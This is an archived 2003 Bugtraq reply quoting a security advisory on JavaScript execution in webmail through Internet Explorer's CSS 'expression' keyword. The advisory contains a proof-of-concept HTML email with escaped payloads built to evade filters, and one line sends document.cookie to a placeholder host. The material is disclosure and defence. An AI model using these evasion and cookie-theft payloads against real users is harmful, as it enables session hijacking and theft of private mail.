<<< Date Index >>>     <<< Thread Index >>>

RE: Webmails + Internet Explorer can create unwanted javascript execution



Yahoo has a massive userbase (with good reason).

This kind of bug could potentially turn some IE security issues into a more
readily mail borne attack. This could be bad. Very bad.

I do not see that you have contacted Yahoo on this. 



> -----Original Message-----
> From: Jedi/Sector One [mailto:j@xxxxxxxxxxxx] 
> Sent: Thursday, October 02, 2003 2:39 PM
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: Webmails + Internet Explorer can create unwanted 
> javascript execution
> 
> 
> 
> 
> Summary : Multiple web-based mail systems browsed through 
> Internet Explorer
>           can allow arbitrary javascript execution.
> Date    : 02/10/2003
> Author  : Frank Denis <j@xxxxxxxxxxxx>
> 
> 
>        ------------------------[ Description ]------------------------
>        
>   The issue described here doesn't reveal a vulnerability in 
> a specific product. But the combination of features of 
> Internet Explorer with features of common webmail software 
> can create a vulnerability.
> 
> 1) Internet Explorer interprets stylesheets for any HTML tag, 
> even non-existent ones. For instance :
> 
> <xbody style="...">
> 
>   is not a valid tag, but attributes are evaluated.
>   
>   It may be considered as a bug or as a logical behavior, 
> your mileage may vary. And this alone is not a security flaw.
> 
> 2) Internet Explorer can evaluate Javascript expressions in 
> style sheets through the "expression" keyword :
> 
> <style type="text/css">
> a {
>   width: expression(6 * 9 + 'px');  
> }
> </style>
> 
>   This is not a bug either, but a proprietary, properly 
> documented extension.
> 
> 3) Due to the increase of HTML-only email, most popular 
> webmail software can display HTML email. In this context, 
> Javascript _must_ be removed from every email. To achieve 
> this result, various tricks are used by webmail software :
> 
>  - Removal or mangling of <script> tags,
>  
>  - Removal or mangling of "javascript:" urls.
>  
>  - Removal or mangling of properties like "onmouseover".
>  
> 
>       ------------------------[ Vulnerability 
> ]------------------------
> 
>   By combining 2) with 3) and if the webmail doesn't filter 
> out stylesheets nor the "expression" keyword, any Javascript 
> contained in a message will be executed as soon as the 
> recipient will display it.
> 
>   Some webmail software are aware of that issue for a while 
> and they are mangling or filtering any occurrence of 
> "expression". However, the mangling may not work when the 
> name of the property is escaped (like "e\xpression") as CSS 
> permits. Or it may not work in the context of 
> non-existent-because- mangled tags. The former worked on 
> Yahoo! until yesterday (the issue was fixed quickly after 
> being reported, they are nice and reactive guys).
> 
>   But most software simply don't know about "expression". 
> They are _not_ faulty, though. This is not a bug nor a 
> vulnerability. "expression" is a proprietary extension. 
> Webmails don't have to know about every possible implication 
> of every proprietary extension of every version of every 
> browser out there.
> 
>   However, when the following conditions are met, the 
> Javascript is executed :
>   
> - "expression" keywords aren't filtered/mangled by the 
> webmail software.
> 
> - The client software is Internet Explorer.
> 
> - Javascript isn't disabled in the client software. 
> Unfortunately, a lot of public webmail systems simply don't 
> work when Javascript is disabled.
>  
> 
>        ------------------------[ Impact ]------------------------
> 
>   Depending on the webmail software, complete control of the 
> client's session may be possible. Private mail can be deleted 
> or bounced to evil addresses, cookies and session identifiers 
> can be stolen, etc.
> 
> 
>     ------------------------[ Proof of concept 
> ]------------------------
>                
>   Webmail software like to filter or mangle stylesheets. Some 
> software totally remove everything inside <head>...</head> 
> tags. Some software totally remove <body>...</body> tags 
> (possibly killing style info by the way) instead of 
> converting them to something like <div>...</div>. Some 
> software totally remove <style>...</style> definitions but 
> accept inline css. 
>   This is bad, because it encourages people to send broken 
> HTML 3 code instead of well-formed, accessible XHTML documents.
>   The following HTML email tries to add workarounds for this 
> kind of filters in order to test whether the "expression" 
> keyword that properly gets evaluated on Internet Explorer. It 
> currently works at least with IE 6 + Squirrelmail, Yahoo! and 
> the software of a dozen public and ISP webmail services I 
> have an account on.
> 
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
>                "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd";>
> <html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="fr"> <head>
>   <title>Webmail test</title>
>   <meta http-equiv="Content-Type" 
> content="text/html;charset=ISO-8859-1" /> </head> <body 
> style="width:&#x65;xpres\sion(alert(1))">
>   <style type="text/css">
> h1 {
>   he\ight:&#x65;\xpression(alert(2));
>   
> bac\kground-image:&#x65;\xpression('url(http://example.org/'+d
> ocument.cookie+$
> }
>   </style>
>   <h1 style="width:&#x65;xpression(alert(3))">...</h1>
>   <div id="just-for-fun">
>     <a href="&#x6A;avascript:window.open(document.location);"
>        onmouseover="alert(4)">fireworks</a>
>   </div>
> </body>
> </html>
> 
> 
>          ------------------------[ Fix ]------------------------
> 
>   For the end user, there are four ways to avoid this issue :
>   
>  - Don't use Internet Explorer to connect to webmails.
> or/and
>  - Disable Javascript.
> or/and
>  - Configure the webmail to only display mails as plain text. or/and 
>  - Only connect to webmails when you are 100% sure the 
> software it is powered by completely filters or mangles 
> "expression" keywords and hope that software and the version 
> won't change silently.
> 
> 
> --
>  __  /*-      Frank DENIS (Jedi/Sector One) 
> <j@xxxxxxxxxxxxxxx>     -*\  __
>  \ '/    <a href="http://www.PureFTPd.Org/";> Secure FTP 
> Server </a>    \' /
>   \/  <a href="http://www.Jedi.Claranet.Fr/";> Misc. free 
> software </a>  \/
>